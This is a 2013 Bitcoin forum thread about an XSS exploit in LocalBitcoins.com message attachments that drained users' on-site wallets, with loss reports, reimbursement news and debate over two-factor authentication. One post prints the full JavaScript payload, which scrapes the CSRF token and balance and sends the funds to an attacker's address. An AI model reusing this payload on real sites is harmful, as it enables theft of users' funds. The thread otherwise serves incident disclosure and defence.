Bitcoin Forum

Economy => Service Discussion => Topic started by: herzmeister on September 13, 2013, 12:05:38 AM



Title: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:05:38 AM
LocalBitcoins.com exploit!

Do NOT open any attachments within the site's messaging system!

https://localbitcoins.com/forums/#!/general-discussion#regarding-the-passport-imag



Title: Re: LocalBitcoins.com exploit!
Post by: superduh on September 13, 2013, 12:07:59 AM
attachments such as? exe files?.....


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:11:53 AM
a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:18:06 AM
FAIL!

traders probably don't have their life savings in there, but they do have there what they need for their daily business


Title: Re: LocalBitcoins.com exploit!
Post by: bbit on September 13, 2013, 12:33:24 AM
LocalBitcoins isn't that where people actually meet in person  why are there bitcoins on the site?


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:35:58 AM
LocalBitcoins isn't that where people actually meet in person  why are there bitcoins on the site?

To put them into the site's escrow for example. And the site features not only in-person trading but also various forms of online trading.


Title: Re: LocalBitcoins.com exploit!
Post by: will1982 on September 13, 2013, 12:40:01 AM
Localbitcoins is one of the few places where I can pick up some BTC with Paypal (at a premium of course) . I hope this doesn't affect traders...


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:43:54 AM
I hope this doesn't affect traders...

if you dare to take a glimpse into the forums right now... Rome is burning!


Title: Re: LocalBitcoins.com exploit!
Post by: will1982 on September 13, 2013, 12:48:07 AM
I hope this doesn't affect traders...

if you dare to take a glimpse into the forums right now... Rome is burning!

Talk of lawsuits and losses of 13BTC+
Ouch...


Title: Re: LocalBitcoins.com exploit!
Post by: stex2009 on September 13, 2013, 01:14:40 AM
Many lost over 5 BTC. not sure how much is true but most of the posters there are decent sellers.


Title: Re: LocalBitcoins.com exploit!
Post by: will1982 on September 13, 2013, 01:21:41 AM
Many lost over 5 BTC. not sure how much is true but most of the posters there are decent sellers.

Have you personally lost anything?


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 01:27:51 AM
How it works exactly? It releases escrow? It sends bitcoins from wallet (impossible with 2FA)?


Title: Re: LocalBitcoins.com exploit!
Post by: DannyHamilton on September 13, 2013, 01:40:29 AM
Many lost over 5 BTC. not sure how much is true but most of the posters there are decent sellers.

Have you personally lost anything?

I expect to be out 4.7 bitcoins depending on how they resolve the issue.


Title: Re: LocalBitcoins.com exploit!
Post by: cbhelp on September 13, 2013, 01:45:01 AM
Coinbase is the way.

Hope you all get repaid.


Title: Re: LocalBitcoins.com exploit!
Post by: culexevilman on September 13, 2013, 01:49:37 AM
I hope they are fixing this shit, cause a shitstorm is coming...


Title: Re: LocalBitcoins.com exploit!
Post by: Fiyasko on September 13, 2013, 01:54:34 AM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 01:58:09 AM
Great news

Quote from: Jeremias
Attachments will stay disabled for the time being. We will think if we disable the feature altogether.
The total loss related to the file upload scam are very likely 82 BTC. I will start covering losses soon.

And cashouts are working again.


Title: Re: LocalBitcoins.com exploit!
Post by: Cryddit on September 13, 2013, 04:22:31 AM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 13, 2013, 05:03:34 AM
If you are an active seller on LocalBitcoins it's helpful to keep some bitcoins in the wallet in order to be able to fund sales efficiently.

I keep just enough to fund the maximum sale amount I have listed in my ads.


Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 05:38:00 AM
I lost 2.23 BTC to this and not happy.  And you can't even do online sales unless you have BTC in your wallet because they go into escrow most of the time.



Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 05:50:48 AM
Localbitcoins is one of the few places where I can pick up some BTC with Paypal (at a premium of course) . I hope this doesn't affect traders...

Of course it's going to affect everyone. I don't even feel comfortable using the site now that I just lost about $300+ in bitcoin. It could have been much worse too because I had about 11 BTC on there just a  couple of hours earlier.  Thank goodness I sold most of it before then.


Title: Re: LocalBitcoins.com exploit!
Post by: melon on September 13, 2013, 05:55:22 AM
did the site offer 2fa on ind. user accounts?... ive never used the site but was eventually thinking of trying it...I think i'll wait!


Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 05:57:04 AM
did the site offer 2fa on ind. user accounts?... ive never used the site but was eventually thinking of trying it...I think i'll wait!

Yes I had 2 factor enabled on my other acct, but not on this one. I hadn't gotten around to putting it on this one which turned out to be a big mistake.  But it wasn't even a problem with someone hacking my password or anything else...it was a flaw with the LBC site.   Although I should have enabled it and just costly bit of laziness there.


Title: Re: LocalBitcoins.com exploit!
Post by: DannyHamilton on September 13, 2013, 06:13:44 AM
Many lost over 5 BTC. not sure how much is true but most of the posters there are decent sellers.

Have you personally lost anything?

I expect to be out 4.7 bitcoins depending on how they resolve the issue.

Turns out I lost nothing.

They re-enabled the withdrawals, and I was able to pull out my 4.7 BTC.

The last claim I saw, they stated that they would restore all accounts that lost bitcoins to the hack/scam.



Title: Re: LocalBitcoins.com exploit!
Post by: mrkent on September 13, 2013, 06:32:03 AM
Turns out I lost nothing.

They re-enabled the withdrawals, and I was able to pull out my 4.7 BTC.

The last claim I saw, they stated that they would restore all accounts that lost bitcoins to the hack/scam.

Where did you see that?

Anyone interested in joining a bailout fund in exchange for equity with localbitcoins? I've been interested in their equity for a while now, but they've never needed funding until perhaps now. It's been generally an excellent service but lately, they've been pushing out new features very fast. Even some simple UI changes can do the site a lot of good.


Title: Re: LocalBitcoins.com exploit!
Post by: spiccioli on September 13, 2013, 06:35:29 AM

Turns out I lost nothing.


Same for me, I pulled out my 2.4 BTCs, but I've been idle for weeks on localbitcoins, so I did not read anything from the site.

spiccioli


Title: Re: LocalBitcoins.com exploit!
Post by: sturle on September 13, 2013, 07:21:44 AM
a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu
Most of those transactions date back to June or earlier.  Is the bug that old?


Title: Re: LocalBitcoins.com exploit!
Post by: willphase on September 13, 2013, 07:52:57 AM
a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu
Most of those transactions date back to June or earlier.  Is the bug that old?

The address in the script is actually 12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c - so it looks like less than 100 has been stolen.  The bug was a plain XSS, localbitcoins seemed to correctly use a CSRF token, but since this wasn't CSRF (the javascript was running in the context of localbitcoins.com) it didn't help.

The solution (in retrospect, so not particularly helpful, but perhaps others will learn from this) is do what Google does, and put all unsanitised user content (e.g. attachments, forums anything that user can control) into a separate domain - e.g. google use the domain googleusercontent.com for all gmail attachments, then even if an attacker is able to get javascript running it has no access to the real site due to same origin policy.

Will


Title: Re: LocalBitcoins.com exploit!
Post by: Itcher on September 13, 2013, 08:15:09 AM
Over and over and over and over again ... I come to the conclusion, that the overwhelming proportion of bitcoin-users and bitcoin-startups do simply miss the basic mental requirements to deal with something like money. Events like this make me missing my good old banker, who is completely incompetent to give any advice but knows how not to rise conflict with the law and give me the security my money stays even when the it-system fails.

Bitcoin has a long long way to go.

By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Tell me: who of you has any idea how money-business works? Who of you has any degree in economics? Who of you has ever seen a bank-office from the inside?

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 08:18:01 AM
localbitcoins.com have optional 2FA but that goes only for logon, and not for withdrawals; you're already logged on when that happens.

a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu
Most of those transactions date back to June or earlier.  Is the bug that old?

sorry, false report then it seems; although i believe the damage is way over 80 BTC if you skim over their forums.


Title: Re: LocalBitcoins.com exploit!
Post by: GoldSilverBitcoin on September 13, 2013, 08:20:45 AM
Regardless, the community should create alternative websites. Perhaps a coder could even pool on the p2p listings across multiple websites.


Title: Re: LocalBitcoins.com exploit!
Post by: sturle on September 13, 2013, 08:38:12 AM
sorry, false report then it seems; although i believe the damage is way over 80 BTC if you skim over their forums.
I see some people yelling and calling their lawyers.  People who have enough BTC in an online wallet to pay a lawyer to do anything meaningful about this are incompetent in the first place.  Fees for decent lawyer start at at least 4 BTC an hour, and this involves dealings with a foreign company (most likely).  I wasn't affected, but if I was I would certainly sit back and see how it turned out before calling anyone.  A couple of weeks of trading fees is enough to reimburse all users.  Stupid USAnians seem to cling to their lawyers every time something unexpected happens.


Title: Re: LocalBitcoins.com exploit!
Post by: Nemesis on September 13, 2013, 09:09:11 AM
Over and over and over and over again ... I come to the conclusion, that the overwhelming proportion of bitcoin-users and bitcoin-startups do simply miss the basic mental requirements to deal with something like money. Events like this make me missing my good old banker, who is completely incompetent to give any advice but knows how not to rise conflict with the law and give me the security my money stays even when the it-system fails.

Bitcoin has a long long way to go.

By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Tell me: who of you has any idea how money-business works? Who of you has any degree in economics? Who of you has ever seen a bank-office from the inside?

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.

What an idiot.

Most online banking in US is unsecured without 2FA. Many experts have spoken regarding this. In Europe, many banks give their customers a card reader as a form of 2FA when doing online banking.

Banks dont give you your money back if your online banking password is compromised ( go read the damn fine print). Your gold old bankers have given you a false sense of security.

Same with creditcare "smart" chip, they use it to protect merchants NOT the card holders. Anyone can pick up your card, and somehow guess your PIN (believe it or not, many ppl use their birthdate as PIN) and they can go shopping spree. In the good old days without smart chips, merchant has to check the signature on the back of your card for every single transaction.

Yeah those are experts!


Title: Re: LocalBitcoins.com exploit!
Post by: Itcher on September 13, 2013, 09:31:42 AM
Over and over and over and over again ... I come to the conclusion, that the overwhelming proportion of bitcoin-users and bitcoin-startups do simply miss the basic mental requirements to deal with something like money. Events like this make me missing my good old banker, who is completely incompetent to give any advice but knows how not to rise conflict with the law and give me the security my money stays even when the it-system fails.

Bitcoin has a long long way to go.

By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Tell me: who of you has any idea how money-business works? Who of you has any degree in economics? Who of you has ever seen a bank-office from the inside?

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.

What an idiot.

Most online banking in US is unsecured without 2FA. Many experts have spoken regarding this. In Europe, many banks give their customers a card reader as a form of 2FA when doing online banking.

??? Every bank-accont I used for the last ten years uses simple 2fa by sms.

Quote
Banks dont give you your money back if your online banking password is compromised ( go read the damn fine print). Your gold old bankers have given you a false sense of security.

They use 2fa. I don't know what's your point.

Quote
Same with creditcare "smart" chip, they use it to protect merchants NOT the card holders. Anyone can pick up your card, and somehow guess your PIN (believe it or not, many ppl use their birthdate as PIN) and they can go shopping spree. In the good old days without smart chips, merchant has to check the signature on the back of your card for every single transaction.

If someone uses his birthday as a pin nobody can't help him. And even in this case: One call to your bank (most offer emergency-lines), and the card is closed. Most cards have a transaction limit of 1.500 / day, so the damage is reduced. Often the transaction isn't processed at this moment and will never processed, or it can be chargebacked. My ec was stolen several times and I didn't loose a cent.

Also: every bank has insurances. If their it failes, the insurances gives the customers account. If there are proovable fraudulent transaction, the insurances pay. And so on.

The only risk I know are this stupid shops which accept ec by signature. But even in this case, if someone shops for thousands of euros: if you can prove it was not your signature than the insurance will pay. And you will be able to proove, cause every shop needs to save the bills. If it doesn't, its insurancy has to pay.

In Bitcointalk nearly every day I find a thread about fraud or scam, someone who looses his account on a wallet due to hackers or stupidity. If both happens with a bank in most cases they get their money back. Here I have seen nearly no case that anybody could help them to get their money back. No chance. Who has your private key can transact your money to his adress and there's absoltely no chance you get it ever back.

blockchain.info ist the onliest case I know which replaced the amount, out of their own money. This is the way it has to be, this gives me hope.

The problem is not the code. Bitcoins code is by far better then bankers code. The problem is the organization respectively the lack of professionel organisation. I hope it will come, but by now bitcoin is the most user-unfriendly kind of money ever existed.

My totally incompetent banker offers me a insurance-system and a banking-system and a law-system which was made to protect me as a consumer.

I don't say bitcoin won't have this. I hope it will.



Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 09:33:42 AM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them. Exactly the same if you want to sell them in another marketplace like Mt.Gox or Bitstamp.
If you don't want to use this services you need to sell privately without scrow... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?


Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 13, 2013, 11:37:44 AM
The problem is not the code. Bitcoins code is by far better then bankers code. The problem is the organization respectively the lack of professionel organisation. I hope it will come, but by now bitcoin is the most user-unfriendly kind of money ever existed.

My totally incompetent banker offers me a insurance-system and a banking-system and a law-system which was made to protect me as a consumer.

I don't say bitcoin won't have this. I hope it will.
I expect a system which provides those services will exist within six months.


Title: Re: LocalBitcoins.com exploit!
Post by: Itcher on September 13, 2013, 11:55:43 AM
The problem is not the code. Bitcoins code is by far better then bankers code. The problem is the organization respectively the lack of professionel organisation. I hope it will come, but by now bitcoin is the most user-unfriendly kind of money ever existed.

My totally incompetent banker offers me a insurance-system and a banking-system and a law-system which was made to protect me as a consumer.

I don't say bitcoin won't have this. I hope it will.
I expect a system which provides those servers will exist within six months.

You're joking?

Such systems need years to eat through regulation-walls, they need billions in the background to make insurance profitable, and they need years of organizing and planning and so on. There is no shortcut.

There are miles between this and every actuall company involved in bitcoin atm.

we'll see it in years. Maybe. If the interest in bitcoins survives.


Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 12:02:08 PM
I got this from LBC and they were true to their word:

"Hi,

As you all probably know, there was a security exploit on LocalBitcoins.com document uploads allowing one user to steal wallet funds with a specially crafted file.

You are being contacted for the reimbursement. We will pay reimbursements automatically for those users who have enabled two-factor authentication since the incident.

If you don't have two-factor authentication enabled and still want the reimbursement right away, just reply to this email. You can also request the reimbursement directly to some other bitcoin address.

For the rest we will reserve some time, so that people can enable two-factor protection. You can enable two-factor even without a smartphone with desktop applications and feature phone apps. See more info about the two-factor authentication here https://localbitcoins.com/guides/security#two-factor

Sincerest apologies for the incident.

- Jeremias Kangas / LocalBitcoins.com"

I enabled two factor and the stolen BTC are back in my acct now.


Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 13, 2013, 12:07:44 PM
Such systems need years to eat through regulation-walls, they need billions in the background to make insurance profitable, and they need years of organizing and planning and so on. There is no shortcut.
We'll see.

BTW, I consider dealing with regulation-walls to be a waste of time and resources. Limiting Bitcoin business models to only the ones sanctioned by governments is like inventing the automobile but artificially restricting it to horse-drawn carriage speeds.


Title: Re: LocalBitcoins.com exploit!
Post by: escrow.ms on September 13, 2013, 12:12:52 PM
They should enable email based authentication or at least security questions for bitcoin withdrawals.


Title: Re: LocalBitcoins.com exploit!
Post by: runeks on September 13, 2013, 12:43:32 PM
This is the exploit in question:

Code:
function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051


Title: Re: LocalBitcoins.com exploit!
Post by: Mike Hearn on September 13, 2013, 02:18:13 PM
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 02:23:07 PM
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for neither buyer nor seller. All that's required is that seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.


Title: Re: LocalBitcoins.com exploit!
Post by: marcovaldo on September 13, 2013, 02:50:44 PM
Did you personnaly lose anything?


Title: Re: LocalBitcoins.com exploit!
Post by: MPOE-PR on September 13, 2013, 02:54:57 PM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.

This, basically. With the addendum that not everyone is cut out to run a business (https://bitcointalk.org/index.php?topic=124441.0). And the post-script that paying attention to what the actually capable (http://trilema.com/category/bitcoin/) have to say is a necessary step.


Title: Re: LocalBitcoins.com exploit!
Post by: johnyj on September 13, 2013, 02:56:34 PM
bitcoin withdraw should be authenticated through email


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 03:02:44 PM
bitcoin withdraw should be authenticated through email

With 2FA I think is enough


Title: Re: LocalBitcoins.com exploit!
Post by: johnyj on September 13, 2013, 03:04:20 PM
bitcoin withdraw should be authenticated through email

With 2FA I think is enough

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different sim card


Title: Re: LocalBitcoins.com exploit!
Post by: Cryddit on September 13, 2013, 03:29:35 PM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them ... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?

Some I bought them from Bitstamp.  And moved them the instant they showed up in Bitstamp account, to my private wallet.  

Some I got for pay - made machine parts for someone. She wanted pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody wanted special exclusive super-secret software analyze enormous big pile of data, paid Bitcoin to keep private from someone else looking at bank account.

Some others I got for pay - Main job, security consult.  I look at malware, see what it does by read machine code, figure out how to clean infected machines.  Clients implement, or I implement, cleaning software, clients then sell.  Pays well.  Twice now I asked pay me in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from speculator got nervous back when price was USD$60.



Title: Re: LocalBitcoins.com exploit!
Post by: joesmoe2012 on September 13, 2013, 06:26:24 PM
You can make 2FA work with differenet SIMs, I have, it's not that difficult. Just backup and then restore.

Everybody should be using 2FA if your dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins behalf in paying out of their pocket for all the stolen coins.


Title: Re: LocalBitcoins.com exploit!
Post by: smoothie on September 14, 2013, 03:37:02 AM
As the saying goes:

Those who fail to learn from history are doomed to repeat it.




Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 14, 2013, 03:40:39 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.


Title: Re: LocalBitcoins.com exploit!
Post by: joesmoe2012 on September 14, 2013, 08:51:22 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 14, 2013, 11:22:17 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.


Title: Re: LocalBitcoins.com exploit!
Post by: johnyj on September 14, 2013, 12:15:56 PM
At lease an email based 2FA is much better


Title: Re: LocalBitcoins.com exploit!
Post by: rufusBTC on September 14, 2013, 05:10:08 PM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.

looks like the exploit just sucked out peoples BTC, through a loophole even if they had 2FA.


Title: Re: LocalBitcoins.com exploit!
Post by: niko on September 14, 2013, 06:46:59 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?


Title: Re: LocalBitcoins.com exploit!
Post by: willphase on September 14, 2013, 10:21:22 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 14, 2013, 10:22:58 PM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  >:(

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.


Title: Re: LocalBitcoins.com exploit!
Post by: niko on September 15, 2013, 01:58:31 AM
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  >:(

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
Ten days ago I was browsing through LBC Site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.